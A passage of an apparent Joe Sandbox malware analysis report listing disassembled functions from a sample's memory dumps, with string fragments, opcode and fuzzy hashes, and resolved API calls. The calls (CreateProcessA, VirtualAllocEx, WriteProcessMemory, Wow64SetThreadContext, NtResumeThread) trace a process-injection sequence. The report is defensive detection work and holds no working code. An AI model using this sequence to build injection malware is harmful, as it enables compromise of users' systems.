Function 05C1E740 Relevance: 16.2, Strings: 12, Instructions: 1173COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C1F1FA
4, xrefs: 05C1F115
$^q, xrefs: 05C1E9D3
$^q, xrefs: 05C1F06A
$^q, xrefs: 05C1EC47
$^q, xrefs: 05C1EB97
$^q, xrefs: 05C1EB87
$^q, xrefs: 05C1F021
$^q, xrefs: 05C1EC37
$^q, xrefs: 05C1F011
$^q, xrefs: 05C1E9C3
$^q, xrefs: 05C1F07A

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 5031852383518f25c0297e40b861ad8db4edbf1f9fb855770fc4814b8bde9491
Instruction ID: 7efedbc28bbd9b5767092b64098a38730b2467fef2be70f5245c4731b1ad8150
Opcode Fuzzy Hash: 5031852383518f25c0297e40b861ad8db4edbf1f9fb855770fc4814b8bde9491
Instruction Fuzzy Hash: FFB2F634A00218CFDB14CFA8C994BADBBB6FB49700F158499E906AB3A4CB71DD85DF54

Function 05C1EA67 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C1F1FA
4, xrefs: 05C1F115
$^q, xrefs: 05C1F06A
$^q, xrefs: 05C1EB87
$^q, xrefs: 05C1EC37
$^q, xrefs: 05C1F011

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 7807249e880f01064e152a882794bf1d9dd4c174c6346360750e24e704e611a9
Instruction ID: bbccf0bb3537e999aba3ac32445844292aa76aa2b24a7effa0cd1f2d57f727ad
Opcode Fuzzy Hash: 7807249e880f01064e152a882794bf1d9dd4c174c6346360750e24e704e611a9
Instruction Fuzzy Hash: F8220934A00219CFDB14CFA4C994BA9BBB6FF49300F148499E90AAB3A5DB70DD85DF54

Function 061F3788 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pbq, xrefs: 061F4342
Te^q, xrefs: 061F3EAB
xbaq, xrefs: 061F38B5
TJcq, xrefs: 061F392A

Memory Dump Source

Source File: 00000007.00000002.2452114986.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61f0000_SxQyhJr.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 375979cfd1a6730e7492246c57b37b19e2fd4d5501a8a674d8c34e915ee8f215
Instruction ID: ffe66dab13619ebab90db10a7ebc866e7d3a93ed71a6a3d74fbdefdf8220605f
Opcode Fuzzy Hash: 375979cfd1a6730e7492246c57b37b19e2fd4d5501a8a674d8c34e915ee8f215
Instruction Fuzzy Hash: 52A2C775E00628CFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40

Function 061F4A68 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 061F5A46
$^q, xrefs: 061F50CA

Memory Dump Source

Source File: 00000007.00000002.2452114986.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61f0000_SxQyhJr.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: e6de418f3bf97d36d5767d6a9c97e6fb6bce8b97b4596bd78e52f82503e7cd91
Instruction ID: 218377b9cccac824b0c8e921c91209b46e60a9f6db589b9500bc492cbbfd1423
Opcode Fuzzy Hash: e6de418f3bf97d36d5767d6a9c97e6fb6bce8b97b4596bd78e52f82503e7cd91
Instruction Fuzzy Hash: 7FE2C374E102288FDB64EF69D994A9EBBF2FB89304F5081E9D509A7358DB305E85CF40

Function 05C1A190 Relevance: 1.7, Strings: 1, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 05C1A56B

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 6f599fe3bfc071bbfa06fd9d5d27645c500555067a0e65c314165bbdf79c8553
Instruction ID: 36bf01459f6a097d667bbdc615982066b14357d4755c6492855a3ca62f48c001
Opcode Fuzzy Hash: 6f599fe3bfc071bbfa06fd9d5d27645c500555067a0e65c314165bbdf79c8553
Instruction Fuzzy Hash: E4221574A05218CFDB14DF69D994B9DBBF2FB8A304F1085AAD809A7354DB305A85CF84

Function 05C1A1A0 Relevance: 1.7, Strings: 1, Instructions: 450COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C1A56B

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 4cc11986df27599c9c276bf19721fb134aa84996cfaecaf7dfb8df1caa9fbdf0
Instruction ID: 206358ef2dba5ed5fdd687943d7e32a896426ec0a1a8a0643f61df200f1c21ac
Opcode Fuzzy Hash: 4cc11986df27599c9c276bf19721fb134aa84996cfaecaf7dfb8df1caa9fbdf0
Instruction Fuzzy Hash: D1122770A05218CFDB14DF69D894B9DBBF2FB8A304F1085AAD809AB354DB305E85CF94

Function 06536E48 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06536ED9

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 338a24c462428d245f782e3c6ff442f20ceab808a5d6939c4afe9f665fec7641
Instruction ID: bb4e8d52054f4f4869ce75e1055bd6409c864af80cc4e55d9fabf00155a5125d
Opcode Fuzzy Hash: 338a24c462428d245f782e3c6ff442f20ceab808a5d6939c4afe9f665fec7641
Instruction Fuzzy Hash: 5821F5B19003499FCB10DFA9D880ADEFBF5FF48310F20842AE859A7210C735A944CBA5

Function 06536E50 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06536ED9

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e9e49744cb412475905437e0717a1226aaef3c96b4accaa602ac271653ba47b2
Instruction ID: c3df5bd6d2322f26b657597135002dea340d2d3e2e0e614cd638fdf53c70d05f
Opcode Fuzzy Hash: e9e49744cb412475905437e0717a1226aaef3c96b4accaa602ac271653ba47b2
Instruction Fuzzy Hash: C32100B1D013499FCB10DFAAD980ADEFBF5FF48310F20842AE819A7210D775A944CBA4

Function 06538F90 Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06539006

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6a4c0eb02166f197561bb95017263e745290a0def5bd37b18871a09cdcc17246
Instruction ID: aec4728fd606aed9f539c46b21b375b532fde3f34b686d9096c671bf3ae79e9d
Opcode Fuzzy Hash: 6a4c0eb02166f197561bb95017263e745290a0def5bd37b18871a09cdcc17246
Instruction Fuzzy Hash: AC2124B1D002588ECB20DFAAC485AEEFBF4FF48320F20842ED459A7250D775A945CFA5

Function 06538F98 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06539006

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b7c49acf53570d73f29f57d6ee1fdf223db6225c657aea93722a32cce6da0f4a
Instruction ID: 11f453ef0289900e20107b038cf405d38351b5336614cf403eb3dff325a9f860
Opcode Fuzzy Hash: b7c49acf53570d73f29f57d6ee1fdf223db6225c657aea93722a32cce6da0f4a
Instruction Fuzzy Hash: 6E1114B1D002188FCB10DFAAC485ADEFBF4FF88320F10842AD459A7250DB75A944CFA5

Function 05C1B1F8 Relevance: 1.5, Strings: 1, Instructions: 286COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C1B294

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 82fcd3eda9cf600044b757466f3b2b541ad06f17fe43cddebb23eac6cb9a4ca1
Instruction ID: b74732a2b4352555f9d36bb29f49967ed2e32d55fa4660fc5045cc0fd29cabe7
Opcode Fuzzy Hash: 82fcd3eda9cf600044b757466f3b2b541ad06f17fe43cddebb23eac6cb9a4ca1
Instruction Fuzzy Hash: 28C1EA70E05208CFDB14DFAAD944BADBBF2FB4A308F5095A9D809A7254DB305E85DF04

Function 05C1B208 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C1B294

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: e9b4d695519abbdde093b9639b677df3853ca6c132c9c02758cd0d678a1878b1
Instruction ID: ece9886826fcd8b83a20a1a3a78ee403ad5b61ed883abc0542eee44bcdb8093e
Opcode Fuzzy Hash: e9b4d695519abbdde093b9639b677df3853ca6c132c9c02758cd0d678a1878b1
Instruction Fuzzy Hash: FEB1E970E05208CFDB14DFAAD984BADBBF2FB8A308F5095A9D809A7255DB305D45DF04

Function 061E11DB Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

dbq, xrefs: 061E1117

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: 2748f5b8dc08524f1b63ff0ef46eaf3c3154c017e2ebd128af1d9136222ba914
Instruction ID: 63e7cc9165c0eacd2a9695c7f4cfa964eed063f347b451e4dd7a44e650d1a02b
Opcode Fuzzy Hash: 2748f5b8dc08524f1b63ff0ef46eaf3c3154c017e2ebd128af1d9136222ba914
Instruction Fuzzy Hash: AA916774D00608CFEB54EFA8C980BADBBB2FF89305F508169D409AB254DB74899ACF44

Function 061E0E98 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

dbq, xrefs: 061E1117

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: 1fed61b4d64f8fe25820da9dca33c3ce2941f974346541af140cd42bad328c19
Instruction ID: 23a66e48acdcc8bb9e7c8e55398ffab5817d6acff338c6b2fb6db2e84f060a8f
Opcode Fuzzy Hash: 1fed61b4d64f8fe25820da9dca33c3ce2941f974346541af140cd42bad328c19
Instruction Fuzzy Hash: AF817774D00618CFEB54EFA8D980BADBBB2FB89305F108169D409A7344DB748E9ACF50

Function 061E0EA8 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

dbq, xrefs: 061E1117

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: 2f8e539e91be37660f7f1ab022c5596a5e6411bcb855e99f961db8cc426f2df1
Instruction ID: ec2304068a75c0637823fbaba9f8f0127886a21a604d457e192ee3fd74845821
Opcode Fuzzy Hash: 2f8e539e91be37660f7f1ab022c5596a5e6411bcb855e99f961db8cc426f2df1
Instruction Fuzzy Hash: 91817670D00618CFEB54EFA9D880BADBBB2FB89305F108169D409A7344DB748E9ACF54

Function 061F63CB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452114986.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61f0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42614e059965c11fd32a62043b960266062b1939dcfaee883b90ddd1be565d3
Instruction ID: ac5be7a2409cf1e1a6767d4a51ba4430a34ba18cb7d10f1b51bcdc7cfb541d8a
Opcode Fuzzy Hash: b42614e059965c11fd32a62043b960266062b1939dcfaee883b90ddd1be565d3
Instruction Fuzzy Hash: AD52D3B4A10229CFDB64DF28C984B9ABBB2FB48305F1095D9D90DA7355DB30AE81CF50

Function 05C18430 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2451980614.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0e5a14be82e330e7807f152005877866883d98ac91a349a2af5a51b903110b
Instruction ID: 0bda63d73287bc751814171fc8c1fde2655896c5cd19542a7c96e3f2f55ed5fb
Opcode Fuzzy Hash: 2a0e5a14be82e330e7807f152005877866883d98ac91a349a2af5a51b903110b
Instruction Fuzzy Hash: BED1DE317056068FEB15EB75C450BAEB7F6AFCA200F24886DD946AB390CF34E901D755

Function 061F4A58 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452114986.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61f0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf8ed4c971a93dd3700edfa49e0aba7acac8c5aff6818bec5714b900122d851
Instruction ID: 57495a0a7a39a631914f236652671c166ec2cc0fec81f4038d724510dc39a958
Opcode Fuzzy Hash: 9bf8ed4c971a93dd3700edfa49e0aba7acac8c5aff6818bec5714b900122d851
Instruction Fuzzy Hash: E851CB71E10A188BEB18DF6BDC4469EFBF3AFC8305F14D1A9D408AA259DB345A85CF50

Function 061F4A20 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452114986.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61f0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd70e4f4c120a1b99c16cc94cfb7ae9efa0143b211ac5aa6eb1c5c4cad41eacb
Instruction ID: e584975e9e762b94790495df3249d23f0102cd44eabfb9c240277ecb23064af5
Opcode Fuzzy Hash: cd70e4f4c120a1b99c16cc94cfb7ae9efa0143b211ac5aa6eb1c5c4cad41eacb
Instruction Fuzzy Hash: 9F51D871E10A188BEB18DF6BDC4079EFAF3BFC8205F14D0A5D409AA259EB304A85CF50

Function 0653789C Relevance: 1.7, APIs: 1, Instructions: 209processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06537A82

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 43bcaf87b3f6ea67a2d13885521c2b4f50772cce68553a5ad999cee83104a601
Instruction ID: 7a1c3d4721eff7ef1c072beb48eed4763ad2c0c5f0504bf7ec2ec5334ac21e4b
Opcode Fuzzy Hash: 43bcaf87b3f6ea67a2d13885521c2b4f50772cce68553a5ad999cee83104a601
Instruction Fuzzy Hash: A38126B1D002698FDB50CFA9C8917EEBBF1FF48710F248629E859AB244D7749981CF85

Function 065378A8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06537A82

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a51a1904ed5f5d0b8f5f35413473ed3d30693b917a82ed1e8700fb3afe6cf052
Instruction ID: 95918fd656e33d80af5f24430d5bb82664263a9f23bfbf275478d9c230bb4453
Opcode Fuzzy Hash: a51a1904ed5f5d0b8f5f35413473ed3d30693b917a82ed1e8700fb3afe6cf052
Instruction Fuzzy Hash: 678135B1D002698FDB50CFA9C8817EEBBF1FF48714F248629E859AB240D7749981CF85

Function 0158A328 Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0158A57E

Memory Dump Source

Source File: 00000007.00000002.2430938160.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1580000_SxQyhJr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7bc049e843e9cc2a4c690633d8b1244f0f6c04deddf3b9a5729d55c2821cd7c5
Instruction ID: 65a2b84359fb168aa1a1b0287e2dfc4ed1f0e60a6c17f82097705d7090f9c157
Opcode Fuzzy Hash: 7bc049e843e9cc2a4c690633d8b1244f0f6c04deddf3b9a5729d55c2821cd7c5
Instruction Fuzzy Hash: 80811670A00B059FDB64EF6DD44575ABBF1FF88204F008A2ED58AEBA50DB75E845CB90

Function 06538920 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 065389B8

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1f78b8f49b9a3a55e6c3a83b9abf10318c9dd1593f73b479a38ac6032df6d5d5
Instruction ID: 1a0997f069a1d00d2d5c5785f172a90a6d57238c38a3aa0a8955280d95758cd4
Opcode Fuzzy Hash: 1f78b8f49b9a3a55e6c3a83b9abf10318c9dd1593f73b479a38ac6032df6d5d5
Instruction Fuzzy Hash: 372137B29002199FCB10CFA9C885BDEBBF5FF48310F10842AE959A7240D7749944CFA5

Function 06538928 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 065389B8

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fbac3b8201f63d5f6483c6807b8926519312ab0ed104ad82658612722747a5ca
Instruction ID: f9d6c187ac22e7acc6bf071085cc844094e80cb11108adbda94989e2bad8c155
Opcode Fuzzy Hash: fbac3b8201f63d5f6483c6807b8926519312ab0ed104ad82658612722747a5ca
Instruction Fuzzy Hash: FE2144B29003199FCB10CFA9C885BDEBBF5FF48310F10842AE959A7240D778A944CBA5

Function 06538070 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 065380F6

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5141d77240aaf74caf6e064a061e714a771b16a6f2fac351737e8e0f8c68b18f
Instruction ID: b34c732ef0313bbbb5c271d9951b14902cc3b6fa203f00f85804e190f801c376
Opcode Fuzzy Hash: 5141d77240aaf74caf6e064a061e714a771b16a6f2fac351737e8e0f8c68b18f
Instruction Fuzzy Hash: 39214A71D002498FCB10DFA9C4857EEFFF4AF49310F148429D499A7241D7789584CFA5

Function 0158C7FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158CBD6,?,?,?,?,?), ref: 0158CC97

Memory Dump Source

Source File: 00000007.00000002.2430938160.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1580000_SxQyhJr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3c1411d1322435cba85d45bb9c4d8c4d826edf34ac0803e694de9abfc92e17cc
Instruction ID: ca34a2a0d6ffc663659a9fb7ad06188313111403008e8b8b4c65a3edf1501a11
Opcode Fuzzy Hash: 3c1411d1322435cba85d45bb9c4d8c4d826edf34ac0803e694de9abfc92e17cc
Instruction Fuzzy Hash: A921E3B59002489FDB10DF9AD984ADEBFF4FB48310F14841AE918B7350D375A954CFA4

Function 06538078 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 065380F6

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d8bbe89ca11072a371bb375c3b423885e511fbb1b1d7330cd7105bc6198ae11b
Instruction ID: be07b3679ecf3b5d76741b9fa86b975ae75345e00119fd5d243ac82fb7d462f8
Opcode Fuzzy Hash: d8bbe89ca11072a371bb375c3b423885e511fbb1b1d7330cd7105bc6198ae11b
Instruction Fuzzy Hash: CF2118B1D002198FDB14DFAAC4857EEFBF4EF88324F148429D459A7241D778A944CFA5

Function 0158CC08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158CBD6,?,?,?,?,?), ref: 0158CC97

Memory Dump Source

Source File: 00000007.00000002.2430938160.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1580000_SxQyhJr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8a278380852f6517845c34811f09aec3519efa39197a08054db6f020ea6a455e
Instruction ID: d757190705eda890a84d7f60597bc5511d1bdf6c5cfbbbff387d74baf8a09e78
Opcode Fuzzy Hash: 8a278380852f6517845c34811f09aec3519efa39197a08054db6f020ea6a455e
Instruction Fuzzy Hash: 4921E3B5D002089FDB10CF99D585ADEBBF4FB08310F14841AE918B7350D378A954CFA4

Function 061E6AE8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 061E6B5C

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8396beff911d219467edec59324018a461f5e716ae854047d06244edb1268abc
Instruction ID: d781814a3d317cd4c4289b0f4071898ae20853252edd8a6124031f19dbe7eb70
Opcode Fuzzy Hash: 8396beff911d219467edec59324018a461f5e716ae854047d06244edb1268abc
Instruction Fuzzy Hash: 472158B1D002098FCB10DFAAC440BEEFBF4EF48320F548429D459A7240C778A944CFA0

Function 061E6AE0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 061E6B5C

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 81f840ab4b415a029124a79d2eb9632f7ac8466692f6eb51f4c934504fa39c60
Instruction ID: 5532965433c19a23a2e5d5b7ba38adc7595586599709dba3b417bb0ec7360f21
Opcode Fuzzy Hash: 81f840ab4b415a029124a79d2eb9632f7ac8466692f6eb51f4c934504fa39c60
Instruction Fuzzy Hash: 462147B2D002098FDB10DFAAC941BEEFBF4EF48320F14882AD459A7240D7389545CFA1

Function 06538678 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 065386EE

Memory Dump Source

Source File: 00000007.00000002.2453187652.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6530000_SxQyhJr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 68c219f51c097b1d591f4338923b706ce3be5241bfaec16170f371c2c6102b7e
Instruction ID: c380965aae252ac3cff1e5a5ac063bafdb895cee9ba78221c33d4f7a8da061a2
Opcode Fuzzy Hash: 68c219f51c097b1d591f4338923b706ce3be5241bfaec16170f371c2c6102b7e
Instruction Fuzzy Hash: BB2147B19002489FCB24DFA9C845BDEBFF5FF48324F208819E559A7250C775A540CFA5

Function 063CDEB8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 063CDF2C

Memory Dump Source

Source File: 00000007.00000002.2453072660.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_63c0000_SxQyhJr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d012f543eaf1a6884a363ec0408b74ddcc72193ce0b662f35e3efc17d1a4b4ab
Instruction ID: 3caf84c2a8acde43cca0dbb17688c261b33147bc806148e77c5967addce78bf7
Opcode Fuzzy Hash: d012f543eaf1a6884a363ec0408b74ddcc72193ce0b662f35e3efc17d1a4b4ab
Instruction Fuzzy Hash: DA11F4B1D042499FCB10DFAAC844ADEFBF4FF88320F14842AE459A7250C775A944CFA5

Function 06538680 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 065386EE

